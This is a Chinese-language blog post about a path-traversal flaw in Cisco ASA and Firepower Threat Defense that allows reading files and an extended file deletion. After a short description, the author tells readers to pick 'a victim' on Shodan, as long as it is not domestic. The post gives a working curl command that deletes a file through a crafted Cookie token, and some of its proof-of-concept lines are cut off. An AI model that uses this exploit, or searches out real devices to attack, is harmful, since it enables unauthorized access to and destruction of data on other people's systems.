简介
Cisco Firepower Threat Defense(FTD)和Cisco Adaptive Security Appliances Software(ASA Software)都是美国思科(Cisco)公司的产品。Cisco Firepower Threat Defense是一套提供下一代防火墙服务的统一软件。Cisco Adaptive Security Appliances Software是一套防火墙和网络安全平台。该平台提供了对数据和网络资源的高度安全的访问等功能。
0x01 漏洞描述
Cisco ASA Software和FTD Software中存在输入验证错误漏洞,该漏洞源于受影响设备没有正确验证HTTP请求中的URL。远程攻击者可通过将包含目录遍历字符序列的特制HTTP请求发送到受影响的设备利用该漏洞在目标设备上查看Web服务文件系统内的任意文件。
0x02 开搞开搞
老规矩,先去shodan上任意寻找一个受害者(别是国内的就行)
1 | shodan搜索: |
POC如下
1 | POC1: |
先来看一下登录界面的样子(要记得哦,后面会有用的):
给出的这两个POC允许未经身份验证在Cisco ASA和Cisco Firepower中读取任意文件,但无法读取OS文件。
如下图所示:
其他还有什么可以读的文件可以自己尝试找找。
接着还发现,通过这个文件遍历漏洞还可以扩展出一个任意文件删除的漏洞。
POCcurl -k -H "Cookie: token=..//+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
这里就用Cisco的logo来演示,右击logo图片找到图片地址。
可以通过curl命令,也可以通过bp来执行删除操作,如下图所示:
emmm 大概就是这么一个鸡肋的漏洞(就和CatGhost漏洞一样,单独一个漏洞没太大的利用价值)
POC
这个漏洞需要POC?